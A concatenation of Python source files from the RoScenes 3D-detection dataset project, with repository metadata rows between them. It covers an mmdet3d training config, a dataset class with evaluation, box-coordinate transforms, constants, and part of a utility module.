feedforward_channels=512, ffn_dropout=0.1, operation_order=('self_attn', 'norm', 'cross_attn', 'norm', 'ffn', 'norm')))), bbox_coder=dict( type='NMSFreeCoder', post_center_range=point_cloud_range, pc_range=point_cloud_range, max_num=300, voxel_size=voxel_size, num_classes=len(class_names)), positional_encoding=dict( type='SinePositionalEncoding', num_feats=128, normalize=True, offset=-0.5), loss_cls=dict( type='FocalLoss', use_sigmoid=True, gamma=2.0, alpha=0.25, loss_weight=2.0), loss_bbox=dict(type='L1Loss', loss_weight=0.25), loss_iou=dict(type='GIoULoss', loss_weight=0.0)), # model training and testing settings train_cfg=dict(pts=dict( # point_cloud_range / voxel_size grid_size=[4000, 320, 1], voxel_size=voxel_size, point_cloud_range=point_cloud_range, out_size_factor=4, assigner=dict( type='HungarianAssigner3D', cls_cost=dict(type='FocalLossCost', weight=2.0), reg_cost=dict(type='BBox3DL1Cost', weight=0.25), iou_cost=dict(type='IoUCost', weight=0.0), # Fake cost. This is just to make it compatible with DETR head. pc_range=point_cloud_range)))) dataset_type = 'RoScenesDataset' data_root = '[DATASET_ROOT]' file_client_args = dict(backend='disk') ida_aug_conf = { "resize_lim": (0.5, 0.56), "final_dim": (576, 1024), "bot_pct_lim": (0.0, 0.0), "rot_lim": (0.0, 0.0), "H": 1080, "W": 1920, "rand_flip": True, } train_pipeline = [ dict(type='LoadMultiViewImageFromFiles', to_float32=True), dict(type='PhotoMetricDistortionMultiViewImage'), dict(type='LoadAnnotations3D', with_bbox_3d=True, with_label_3d=True, with_attr_label=False), dict(type='ObjectRangeFilter', point_cloud_range=point_cloud_range), dict(type='ObjectNameFilter', classes=class_names), dict(type='ResizeCropFlipImage', data_aug_conf = ida_aug_conf, training=True), dict(type='GlobalRotScaleTransImage', rot_range=[-0.0436111111, 0.0436111111], translation_std=[0, 0, 0], scale_ratio_range=[0.95, 1.05], reverse_angle=False, training=True ), dict(type='NormalizeMultiviewImage', **img_norm_cfg), dict(type='PadMultiViewImage', size_divisor=32), dict(type='DefaultFormatBundle3D', class_names=class_names), dict(type='Collect3D', keys=['gt_bboxes_3d', 'gt_labels_3d', 'img']) ] test_pipeline = [ dict(type='LoadMultiViewImageFromFiles', to_float32=True), dict(type='ResizeCropFlipImage', data_aug_conf = ida_aug_conf, training=False), dict(type='NormalizeMultiviewImage', **img_norm_cfg), dict(type='PadMultiViewImage', size_divisor=32), dict( type='MultiScaleFlipAug3D', img_scale=(1333, 800), pts_scale_ratio=1, flip=False, transforms=[ dict( type='DefaultFormatBundle3D', class_names=class_names, with_label=False), dict(type='Collect3D', keys=['img']) ]) ] data = dict( samples_per_gpu=batch_size, workers_per_gpu=4, train=dict( type=dataset_type, data_root=data_root + '/train/*', # This is just a placeholder, not used. You could specify any exist file. ann_file=data_root + 'train/s001_split_train_difficulty_mixed_ambience_day/database/scene.pkl', pipeline=train_pipeline, classes=class_names, modality=input_modality, test_mode=False, use_valid_flag=True, # we use box_type_3d='LiDAR' in kitti and nuscenes dataset # and box_type_3d='Depth' in sunrgbd and scannet dataset. box_type_3d='LiDAR' ), val=dict(type=dataset_type, data_root=data_root + '/val/*', ann_file=data_root + 'val/s001_split_validation_difficulty_mixed_ambience_day/database/scene.pkl',pipeline=test_pipeline, classes=class_names, modality=input_modality), test=dict(type=dataset_type, data_root=data_root + '/test/*', ann_file=data_root + 'test/NO_GTs005_split_test_difficulty_mixed_ambience_day/database/scene.pkl',pipeline=test_pipeline, classes=class_names, modality=input_modality), shuffler_sampler=dict(type='InfiniteGroupEachSampleInBatchSampler'), nonshuffler_sampler=dict(type='DistributedSampler')) optimizer = dict( type='AdamW', lr=2e-4, paramwise_cfg=dict( custom_keys={ 'img_backbone': dict(lr_mult=0.1), }), weight_decay=0.01) optimizer_config = dict(grad_clip=dict(max_norm=35, norm_type=2)) # learning policy lr_config = dict( policy='CosineAnnealing', warmup='linear', warmup_iters=500, warmup_ratio=1.0 / 3, min_lr_ratio=1e-3) evaluation = dict(interval=num_iters_per_epoch*num_epochs, pipeline=test_pipeline) checkpoint_config = dict(interval=10000, max_keep_ckpts=3) runner = dict( type='IterBasedRunner', max_iters=num_epochs * num_iters_per_epoch) load_from='ckpts/fcos3d_vovnet_imgbackbone-remapped.pth' find_unused_parameters=False
8,175
Python
.py
216
28.541667
176
0.592294
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,416
roscenes_dataset.py
roscenes_RoScenes/examples/mmdet3d/mmdet3d_plugin/datasets/roscenes_dataset.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. from __future__ import annotations import json import math import os import shutil import cv2 import numpy as np from mmdet3d.core.bbox import LiDARInstance3DBoxes from mmdet3d.datasets.custom_3d import Custom3DDataset from mmdet.datasets import DATASETS from shapely.geometry import Polygon from roscenes.data import Clip, Frame, Scene, ConcatScene from roscenes.data.metadata import Split from roscenes.evaluation.detection import MultiView3DEvaluator, ThresholdMetric, DetectionEvaluationConfig from roscenes.evaluation.detection import Prediction from roscenes.transform import xyzwlhq2kitti, kitti2xyzwlhq COLOR_PALETTE = [ [0, 0, 0], [0, 0, 255], [255, 0, 0], [0, 255, 0], [0, 255, 255] ] @DATASETS.register_module(force=True) class RoScenesDataset(Custom3DDataset): """Customized 3D dataset. This is the base dataset of SUNRGB-D, ScanNet, nuScenes, and KITTI dataset. .. code-block:: none [ {'sample_idx': 'lidar_points': {'lidar_path': velodyne_path, .... }, 'annos': {'box_type_3d': (str) 'LiDAR/Camera/Depth' 'gt_bboxes_3d': <np.ndarray> (n, 7) 'gt_names': [list] .... } 'calib': { .....} 'images': { .....} } ] Args: data_root (str): Path of dataset root. ann_file (str): Path of annotation file. pipeline (list[dict], optional): Pipeline used for data processing. Defaults to None. classes (tuple[str], optional): Classes used in the dataset. Defaults to None. modality (dict, optional): Modality to specify the sensor data used as input. Defaults to None. box_type_3d (str, optional): Type of 3D box of this dataset. Based on the `box_type_3d`, the dataset will encapsulate the box to its original format then converted them to `box_type_3d`. Defaults to 'LiDAR'. Available options includes - 'LiDAR': Box in LiDAR coordinates. - 'Depth': Box in depth coordinates, usually for indoor dataset. - 'Camera': Box in camera coordinates. filter_empty_gt (bool, optional): Whether to filter empty GT. Defaults to True. test_mode (bool, optional): Whether the dataset is in test mode. Defaults to False. """ CLASSES = [ "other", "truck", "bus", "van" "car", ] ErrNameMapping = { "trans_err": "mATE", "scale_err": "mASE", "orient_err": "mAOE", "vel_err": "mAVE", "attr_err": "mAAE", } data_infos: Scene def __init__(self, data_root, ann_file, data_list=None, pipeline=None, classes=None, modality=None, box_type_3d='LiDAR', filter_empty_gt=True, use_valid_flag=False, test_mode=False): super().__init__(data_root, ann_file, pipeline, classes, modality, box_type_3d, filter_empty_gt, test_mode) self.seq_split_num = 1 self._set_sequence_group_flag() def _set_sequence_group_flag(self): """ Set each sequence to be a different group """ res = [] curr_sequence = 0 for idx in range(len(self.data_infos)): if idx != 0 and self.data_infos[idx].previous is not None: # Not first frame and previous is None -> new sequence curr_sequence += 1 res.append(curr_sequence) self.flag = np.array(res, dtype=np.int64) if self.seq_split_num != 1: if self.seq_split_num == 'all': self.flag = np.array(range(len(self.data_infos)), dtype=np.int64) else: bin_counts = np.bincount(self.flag) new_flags = [] curr_new_flag = 0 for curr_flag in range(len(bin_counts)): curr_sequence_length = np.array( list(range(0, bin_counts[curr_flag], math.ceil(bin_counts[curr_flag] / self.seq_split_num))) + [bin_counts[curr_flag]]) for sub_seq_idx in (curr_sequence_length[1:] - curr_sequence_length[:-1]): for _ in range(sub_seq_idx): new_flags.append(curr_new_flag) curr_new_flag += 1 assert len(new_flags) == len(self.flag) assert len(np.bincount(new_flags)) == len(np.bincount(self.flag)) * self.seq_split_num self.flag = np.array(new_flags, dtype=np.int64) def load_annotations(self, ann_file): """Load annotations from ann_file. Args: ann_file (str): Path of the annotation file. Returns: Scene """ scene = Scene.load(self.data_root) print('load a scene with length:', len(scene)) return scene def get_data_info(self, index): """Get data info according to the given index. Args: index (int): Index of the sample data to get. Returns: dict: Data information that will be passed to the data preprocessing pipelines. It includes the following keys: - sample_idx (str): Sample index. - pts_filename (str): Filename of point clouds. - file_name (str): Filename of point clouds. - ann_info (dict): Annotation info. """ # a frame frame: Frame = self.data_infos[index] input_dict = dict( sample_idx=index, scene_token=frame.parent.token, timestamp=frame.timeStamp / 1e6) clip: Clip = frame.parent # NOTE: Copy it to avoid inplace manipulation on raw data --- This causes a messd up. intrinsics = [c.intrinsic.copy() for c in clip.cameras.values()] extrinsics = [c.extrinsic.copy() for c in clip.cameras.values()] world2image = [c.world2image.copy() for c in clip.cameras.values()] input_dict.update(dict( img_timestamp=[frame.timeStamp / 1e6 for _ in range(len(frame.imagePaths))], img_filename=list(frame.images.values()), lidar2img=world2image, lidar2cam=extrinsics, cam_intrinsic=intrinsics )) if not self.test_mode: gt_bboxes = LiDARInstance3DBoxes(np.concatenate([xyzwlhq2kitti(frame.boxes3D), frame.velocities], -1).astype(np.float32), box_dim=7 + 2, origin=(0.5, 0.5, 0.5)).convert_to(self.box_mode_3d) annos = dict( gt_bboxes_3d=gt_bboxes, gt_labels_3d=frame.labels.copy(), gt_names=self.CLASSES, bboxes_ignore=None ) input_dict['ann_info'] = annos return input_dict def evaluate(self, results, metric='bbox', logger=None, jsonfile_prefix=None, result_names=['pts_bbox'], show=False, out_dir="results", pipeline=None): """Evaluation in nuScenes protocol. Args: results (list[dict]): Testing results of the dataset. metric (str | list[str], optional): Metrics to be evaluated. Default: 'bbox'. logger (logging.Logger | str, optional): Logger used for printing related information during evaluation. Default: None. jsonfile_prefix (str, optional): The prefix of json files including the file path and the prefix of filename, e.g., "a/b/prefix". If not specified, a temp file will be created. Default: None. show (bool, optional): Whether to visualize. Default: False. out_dir (str, optional): Path to save the visualization results. Default: None. pipeline (list[dict], optional): raw data loading for showing. Default: None. Returns: dict[str, float]: Results of each evaluation metric. """ if isinstance(self.data_infos, ConcatScene): metadata = self.data_infos.scenes[0].metadata else: metadata = self.data_infos.metadata visFolder = out_dir os.makedirs(visFolder, exist_ok=True) previousClip = None predictionList = list() clips = list() for i, res in enumerate(results): frame = self.data_infos[i] boxes_3d = res['pts_bbox']['boxes_3d'] scores_3d = res['pts_bbox']['scores_3d'] labels_3d = res['pts_bbox']['labels_3d'] # [N, 7+2] xyzwlhr, velocities = boxes_3d.tensor[:, :7].detach().clone(), boxes_3d.tensor[:, 7:9].detach().clone() xyzwlhq = kitti2xyzwlhq(xyzwlhr.cpu().numpy().copy()) # if i % 60 == 58: # boxes2vis = boxes_3d[scores_3d > 0.3] # scores2vis = scores_3d[scores_3d > 0.3] # labels2vis = labels_3d[scores_3d > 0.3] # # projectedResults = view.parent.projection(kitti2corners(boxes_3d.tensor.detach().clone().cpu().numpy()[..., :7])) # projectedResults = view.parent.projection(boxes2vis.corners.detach().cpu().numpy()) # for k, (imagePath, (boxes, vis)) in enumerate(zip(view.images.values(), projectedResults)): # img = cv2.imread(imagePath) # cleanImg = img.copy() # sortIds = np.argsort(-np.mean(boxes[..., -1], -1)) # # [N, 8, 2] # boxes = boxes[sortIds, ..., :2] # scores2vis = scores2vis[sortIds] # labels2vis = labels2vis[sortIds] # vis = vis[sortIds] # # [4] in xy format # for box3d, score, label in zip(boxes[vis], scores2vis[vis], labels2vis[vis]): # # crop the clean object region # # paste to current image # # then draw line # objectPoly = Polygon(box3d) # objectPoly = np.array(objectPoly.convex_hull.exterior.coords, dtype=np.int32) # mask = np.zeros_like(cleanImg[..., 0]) # cv2.drawContours(mask, [objectPoly], -1, (255, 255, 255), -1, cv2.LINE_AA) # # print(img.shape, cleanImg.shape, mask.shape) # fg = cv2.bitwise_and(cleanImg, cleanImg, mask=mask) # bg = (img * (1 - mask[..., None] / 255.)).astype(np.uint8) # img = fg + bg # cv2.polylines(img, [box3d[:4].astype(int)], True, COLOR_PALETTE[label], 3, cv2.LINE_AA) # cv2.polylines(img, [box3d[4:].astype(int)], True, COLOR_PALETTE[label], 3, cv2.LINE_AA) # cv2.polylines(img, [box3d[[0, 1, 5, 4]].astype(int)], True, COLOR_PALETTE[label], 3, cv2.LINE_AA) # cv2.polylines(img, [box3d[[2, 3, 7, 6]].astype(int)], True, COLOR_PALETTE[label], 3, cv2.LINE_AA) # cv2.putText(img, f"{score:.2f}", box3d[4, :2].astype(np.int32), cv2.FONT_HERSHEY_PLAIN, 2.0, (255, 255, 255), 3, cv2.LINE_AA) # cv2.putText(img, f"{score:.2f}", box3d[4, :2].astype(np.int32), cv2.FONT_HERSHEY_PLAIN, 2.0, (0, 0, 0), 2, cv2.LINE_AA) # os.makedirs(os.path.join(visFolder, str(i)), exist_ok=True) # cv2.imwrite(os.path.join(visFolder, str(i), f"{view.token}_{k}.jpg"), img) prediction = Prediction( timeStamp=frame.timeStamp, boxes3D=xyzwlhq, velocities=velocities.cpu().numpy().copy(), labels=labels_3d.cpu().numpy().copy(), scores=scores_3d.cpu().numpy().copy(), token=frame.token ) predictionList.append(prediction) groundtruth = self.data_infos evaluator = MultiView3DEvaluator(DetectionEvaluationConfig( self.CLASSES, [0.5, 1., 2., 4.], 2., ThresholdMetric.CenterDistance, 500, 0.0, [-400., -40., 0., 400., 40., 6.], ["ATE", "ASE", "AOE"] )) result = evaluator(groundtruth, predictionList) summary = result.summary with open(os.path.join(out_dir, "result.json"), "w") as fp: json.dump(summary, fp) print(result) return summary
13,791
Python
.py
297
34.750842
201
0.547855
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,417
__init__.py
roscenes_RoScenes/examples/mmdet3d/mmdet3d_plugin/datasets/__init__.py
###################### OTHER IMPORTS ###################### ###################### OTHER IMPORTS ###################### ###################### OTHER IMPORTS ###################### "..." from .roscenes_dataset import RoScenesDataset __all__ = [ '...' '...' '...' '...' 'RoScenesDataset' ]
309
Python
.py
12
23
59
0.317568
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,418
transform.py
roscenes_RoScenes/roscenes/transform.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. import numpy as np from scipy.spatial.transform import Rotation def xyzwlhq2corners(xyzwlhq: np.ndarray) -> np.ndarray: """ ``` up z x front (yaw=0) ^ ^ | / | / (yaw=0.5*pi) left y <------ 0 1 -front-- 0 /| /| 2 --back-- 3 . h | | | | . 5 -------. 4 |/ bot |/ l 6 -------- 7 w ``` Args: xyzwlhq (`NDArray[float64]`): `[N, 10+]` array of [x, y, z], [w, l, h], and a quaternion [4], and other values not used here. Returns: `NDArray[float64]`: `[N, 8, 3]` corner coordinates. """ xyzwlhq = xyzwlhq.copy() def _createCenteredBox(wlh): wlh = wlh / 2 w, l, h = wlh[:, 0], wlh[:, 1], wlh[:, 2] # [N, 4, 3] bottom = np.stack([ np.stack([ l, -w, -h], -1), # bottom head right np.stack([ l, w, -h], -1), # bottom head left np.stack([-l, w, -h], -1), # bottom tail left np.stack([-l, -w, -h], -1), # botoom tail right ], -2) top = bottom.copy() top[..., 2] *= -1 # [N, 8, 3] corners = np.concatenate([top, bottom], -2) return corners # the box centered by (0, 0, 0), [N, 8, 3] centeredBox = _createCenteredBox(xyzwlhq[:, 3:6]).copy() # rotate, then translate rotatedBox = Rotation.from_quat(np.broadcast_to(xyzwlhq[:, 6:].copy()[:, None, :], [len(centeredBox), 8, 4]).reshape(-1, 4)).apply(centeredBox.reshape(-1, 3)).reshape(-1, 8, 3) # [N, 1, 3] xyz = xyzwlhq[:, None, :3] # [N, 8, 3] result = rotatedBox + xyz return result def corners2xyzwlhq(corners3d: np.ndarray) -> np.ndarray: """ ``` up z x front (yaw=0) ^ ^ | / | / (yaw=0.5*pi) left y <------ 0 1 -front-- 0 /| /| 2 --back-- 3 . h | | | | . 5 -------. 4 |/ bot |/ l 6 -------- 7 w ``` Args: corners: (N, 8, 3) [x0, y0, z0, ..., x7, y7, z7], (x, y, z) in lidar coords Returns: array: (N, 3 + 3 + 4), [x, y, z], [w, l, h], [q1, q2, q3, q4]. """ corners3d = corners3d.copy() def _transformMatrix(realCoord): # [3, 3] alignBasis = np.eye(3) transformMatrix = np.einsum("ji,njk->nik", alignBasis, realCoord) return Rotation.from_matrix(transformMatrix).as_quat() width = np.linalg.norm(corners3d[..., [4, 7, 0, 3], :] - corners3d[..., [5, 6, 1, 2], :], axis=-1).mean(-1) length = np.linalg.norm(corners3d[..., [4, 5, 0, 1], :] - corners3d[..., [7, 6, 3, 2], :], axis=-1).mean(-1) height = np.linalg.norm(corners3d[..., [4, 5, 6, 7], :] - corners3d[..., [0, 1, 2, 3], :], axis=-1).mean(-1) # calculate xyz on the bottom plane. top plane is parallel to bottom. # [N, 3] xReal = (corners3d[..., [4, 5], :] - corners3d[..., [7, 6], :]).sum(-2) xReal /= np.linalg.norm(xReal, axis=-1, keepdims=True) yReal = (corners3d[..., [6, 5], :] - corners3d[..., [7, 4], :]).sum(-2) yReal /= np.linalg.norm(yReal, axis=-1, keepdims=True) zReal = np.cross(xReal, yReal) zReal /= np.linalg.norm(zReal, axis=-1, keepdims=True) # [N, 3, 3] realCoord = np.stack([xReal, yReal, zReal], -1) # [N, 3, 3] quat = _transformMatrix(realCoord) # [N, 3] center_point = corners3d.mean(-2) # [N, 3 + 3 + 4] rectified = np.concatenate([center_point, np.stack([width, length, height], -1), quat], -1) return rectified def xyzwlhq2kitti(xyzwlhq: np.ndarray) -> np.ndarray: """ ``` up z x front (yaw=0) ^ ^ | / | / (yaw=0.5*pi) left y <------ 0 1 -front-- 0 /| /| 2 --back-- 3 . h | | | | . 5 -------. 4 |/ bot |/ l 6 -------- 7 w ``` Args: corners: (N, 8, 3) [x0, y0, z0, ..., x7, y7, z7], (x, y, z) in lidar coords Returns: kitti box: (7,) [x, y, z, w, l, h, r] in lidar coords, origin: (0.5, 0.5, 0.5) """ xyzwlhq = xyzwlhq.copy() q = xyzwlhq[:, 6:10] # [N, 1] # This is confirmed by visualization yaw = np.pi / 2 + Rotation.from_quat(q).as_euler('zyx')[:, :1] return np.concatenate([xyzwlhq[:, :6], yaw], -1) def corners2kitti(corners3d: np.ndarray) -> np.ndarray: """ ``` up z x front (yaw=0) ^ ^ | / | / (yaw=0.5*pi) left y <------ 0 1 -front-- 0 /| /| 2 --back-- 3 . h | | | | . 5 -------. 4 |/ bot |/ l 6 -------- 7 w ``` Args: xyzwlhq: (N, 3 + 3 + 4), [x, y, z], [w, l, h], [q1, q2, q3, q4]. Returns: kitti box: (7,) [x, y, z, w, l, h, r] in lidar coords, origin: (0.5, 0.5, 0.5) """ return xyzwlhq2kitti(corners2xyzwlhq(corners3d)) def kitti2xyzwlhq(kitti: np.ndarray) -> np.ndarray: """ See `xyzwlhq2kitti`, this is the reverse transform. """ xyzwlhr = kitti[:, :7].copy() yaws = xyzwlhr[:, 6:].copy() # See xyzwlhq2kitti ypr = np.concatenate([yaws - np.pi / 2, np.zeros_like(yaws), np.zeros_like(yaws)], -1) # [N, 4] q = Rotation.from_euler("zyx", ypr).as_quat() # [N, 10] return np.concatenate([xyzwlhr[:, :6], q], -1) def kitti2corners(kitti: np.ndarray) -> np.ndarray: """ ``` up z x front (yaw=0) ^ ^ | / | / (yaw=0.5*pi) left y <------ 0 1 -front-- 0 /| /| 2 --back-- 3 . h | | | | . 5 -------. 4 |/ bot |/ l 6 -------- 7 w ``` Args: kitti box: (7,) [x, y, z, w, l, h, r] in lidar coords, origin: (0.5, 0.5, 0.5) Returns: corners: (N, 8, 3). """ xyzwlhr = kitti[:, :7].copy() def _createCenteredBox(wlh): wlh = wlh / 2 w, l, h = wlh[:, 0], wlh[:, 1], wlh[:, 2] # [N, 4, 3] bottom = np.stack([ np.stack([ l, -w, -h], -1), # bottom head right np.stack([ l, w, -h], -1), # bottom head left np.stack([-l, w, -h], -1), # bottom tail left np.stack([-l, -w, -h], -1), # botoom tail right ], -2) top = bottom.copy() top[..., 2] *= -1 # [N, 8, 3] corners = np.concatenate([top, bottom], -2) return corners # the box centered by (0, 0, 0), [N, 8, 3] centeredBox = _createCenteredBox(xyzwlhr[:, 3:6]).copy() # rotate, then translate # [N, 3] # See xyzwlhq2kitti yaws = xyzwlhr[:, 6:].copy() ypr = np.concatenate([yaws - np.pi / 2, np.zeros_like(yaws), np.zeros_like(yaws)], -1) rotatedBox = Rotation.from_euler("zyx", np.broadcast_to(ypr[:, None, :], [len(centeredBox), 8, 3]).reshape(-1, 3)).apply(centeredBox.reshape(-1, 3)).reshape(-1, 8, 3) # [N, 1, 3] xyz = xyzwlhr[:, None, :3] # [N, 8, 3] result = rotatedBox + xyz return result def yaw2quat(yaws: np.ndarray) -> np.ndarray: """Converts yaw to quanternion. ``` BEV Y ^ | / | / |/ yaw 0--------> X Args: yaws: (N) or (N, 1) Returns: quats: (N, 4). ``` """ if len(yaws.shape) == 1: yaws = yaws[:, None] elif len(yaws.shape) > 2: raise RuntimeError(f"yaws shape mismatch: {yaws.shape}. Expected a [N, 1]") elif yaws.shape[-1] != 1: raise RuntimeError(f"yaws shape mismatch: {yaws.shape}. Expected a [N, 1]") # See xyzwlhq2kitti # [N, 3] ypr = np.concatenate([yaws.copy() - np.pi / 2, np.zeros_like(yaws), np.zeros_like(yaws)], -1) # [N, 4] rotation = Rotation.from_euler("zyx", ypr).as_quat() return rotation def quat2yaw(quats: np.ndarray) -> np.ndarray: """Converts quanternion to yaw. pitch and roll are set to 0. ``` BEV Y ^ | / | / |/ yaw 0--------> X Args: quats: (N, 4). Returns: yaws: (N, 1) ``` """ if len(quats.shape) != 2: raise RuntimeError(f"quats shape mismatch: {quats.shape}. Expected a [N, 4]") elif quats.shape[-1] != 1: raise RuntimeError(f"quats shape mismatch: {quats.shape}. Expected a [N, 4]") return Rotation.from_quat(quats).as_euler('zyx')[:, :1] def xyzwlhq2bevbox(boxes: np.ndarray) -> np.ndarray: """Converts 3D boxes to bev rotated 2D boxes. ``` BEV Y ^ | / | / |/ yaw 0--------> X Args: boxes: (N, 10+) in xyzwlhq format. Returns: bev boxes: (N, 4, 2). ``` """ yaw = quat2yaw(boxes[:, 6:10]) # [N, 2] xy = boxes[:, :2] # [N, 2] halfLW = (boxes[:, 3:5] / 2)[:, ::-1] # [N, 4, 2] normalBox = np.array([ [halfLW[:, 0], -halfLW[:, 1]], [halfLW[:, 0], halfLW[:, 1]], [-halfLW[:, 0], halfLW[:, 1]], [-halfLW[:, 0], -halfLW[:, 1]] ]).transpose(2, 0, 1) # [N, 2, 2] rotate = np.array([ [np.cos(yaw), -np.sin(yaw)], [np.sin(yaw), np.cos(yaw)] ]).transpose(2, 1, 0) rotateBox = np.matmul(normalBox, rotate) final = rotateBox + xy[:, None, :] return final
10,588
Python
.py
311
25.681672
180
0.466817
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,419
__init__.py
roscenes_RoScenes/roscenes/__init__.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. import roscenes.data import roscenes.evaluation import roscenes.visualizer from roscenes.data.scene import Scene load = Scene.load
854
Python
.py
20
41.55
75
0.760529
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,420
consts.py
roscenes_RoScenes/roscenes/consts.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. import logging from collections import OrderedDict from rich.progress import Progress, TimeElapsedColumn, BarColumn, TimeRemainingColumn, MofNCompleteColumn richProgress = Progress("[i blue]{task.description}[/]", MofNCompleteColumn(), TimeElapsedColumn(), BarColumn(None), TimeRemainingColumn(), refresh_per_second=6, transient=True, expand=True) logger = logging.getLogger('roscenes') strLabels = OrderedDict( [ (0, 'other'), (1, 'truck'), (2, 'bus'), (3, 'van'), (4, 'car') ] ) intLabels = OrderedDict( [ ('other', 0), ('truck', 1), ('bus', 2), ('van', 3), ('car', 4) ] )
1,395
Python
.py
38
33.078947
190
0.682927
roscenes/RoScenes
8
0
2
GPL-3.0
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,421
misc.py
roscenes_RoScenes/roscenes/misc.py
# RoScenes # Copyright (C) 2024 Alibaba Cloud # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <https://www.gnu.org/licenses/>. #################################################### ####### https://github.com/VL-Group/vlutils ######## #################################################### from __future__ import annotations import re import os import inspect import functools import abc import sys import logging import logging.config import multiprocessing import time import contextlib from io import StringIO from typing import Optional, ClassVar, Dict, Generic, TypeVar import joblib import yaml import rich.logging from rich.console import ConsoleRenderable from rich.text import Text from rich.progress import Progress from roscenes.consts import logger T = TypeVar("T") __all__ = [ 'WaitingBar', 'LoggingDisabler', 'configLogging', 'readableSize', 'DecoratorContextManager', 'Registry' ] # https://github.com/pytorch/pytorch/blob/671ee71ad4b6f507218d1cad278a8e743780b716/torch/autograd/grad_mode.py#L16 class DecoratorContextManager(abc.ABC): """Allow a context manager to be used as a decorator Example: ```python class Foo(DecoratorContextManager): ... def __enter__(self): ... def __exit__(self, exc_type, exc_val, exc_tb): ... # normal usecase def add(x, y): return a + b # Normal usecase with Foo(): add(3, 4) # Equivalent @Foo() def addD(x, y): return a + b addD(3, 4) ``` """ def __call__(self, func): if inspect.isgeneratorfunction(func): return self._wrap_generator(func) @functools.wraps(func) def decorate_context(*args, **kwargs): with self: return func(*args, **kwargs) return decorate_context def _wrap_generator(self, func): """Wrap each generator invocation with the context manager""" @functools.wraps(func) def generator_context(*args, **kwargs): gen = func(*args, **kwargs) while True: try: with self: x = next(gen) yield x except StopIteration: break return generator_context @abc.abstractmethod def __enter__(self): raise NotImplementedError @abc.abstractmethod def __exit__(self, exc_type, exc_val, exc_tb): raise NotImplementedError def readableSize(size: int, floating: int = 2, binary: bool = True) -> str: """Convert bytes to human-readable string (like `-h` option in POSIX). Args: size (int): Total bytes. floating (int, optional): Floating point length. Defaults to 2. binary (bool, optional): Format as X or Xi. Defaults to True. Returns: str: Human-readable string of size. """ size = float(size) unit = "B" if binary: for unit in ['', 'ki', 'Mi', 'Gi', 'Ti', 'PiB']: if size < 1024.0 or unit == 'Pi': break size /= 1024.0 return f"{size:.{floating}f}{unit}" for unit in ['', 'k', 'M', 'G', 'T', 'P']: if size < 1000.0 or unit == 'P': break size /= 1000.0 return f"{size:.{floating}f}{unit}" class WaitingBar(DecoratorContextManager): """A CLI tool for printing waiting bar. Example: ```python @WaitingBar("msg") def longTime(): # Long time operation ... with WaitingBar("msg"): # Long time operation ... ``` Args: msg (str): Addtional message shows after bar. ncols (int): Total columns of bar. """ def __init__(self, msg: str, ncols: int = 10): if ncols <= 8: raise ValueError("ncols must greater than 8, got %d", ncols) self._msg = msg self._ticker = None self._stillRunning = None self._ncols = ncols self.animation = list() # " = " template = (" " * (ncols + 1) + "=" * (ncols - 8) + " " * (ncols + 1)) for i in range(2 * (ncols - 2)): start = 2 * (ncols - 2) - i end = 3 * (ncols - 2) - i self.animation.append("[" + template[start:end] + "]" + r" %s") def __enter__(self): self._stillRunning = multiprocessing.Value("b", True) self._ticker = multiprocessing.Process(name="waitingBarTicker", target=self._print, args=[self._stillRunning]) self._ticker.start() def __exit__(self, exc_type, exc_val, exc_tb): self._stillRunning.value = False self._ticker.join() print(" " * (len(self._msg) + self._ncols + 1), end="\r", file=sys.stderr) def _print(self, stillRunning: multiprocessing.Value): i = 0 while bool(stillRunning.value): print(self.animation[i % len(self.animation)] % self._msg, end='\r', file=sys.stderr) time.sleep(.06) i += 1 class LoggingDisabler: """Disable or enable logging temporarily. Example: ```python # True -> disable logging, False -> enable logging with LoggingDisabler(logger, True): # Some operations ... ``` Args: logger (logging.Logger): The target logger to interpolate. disable (bool): Whether to 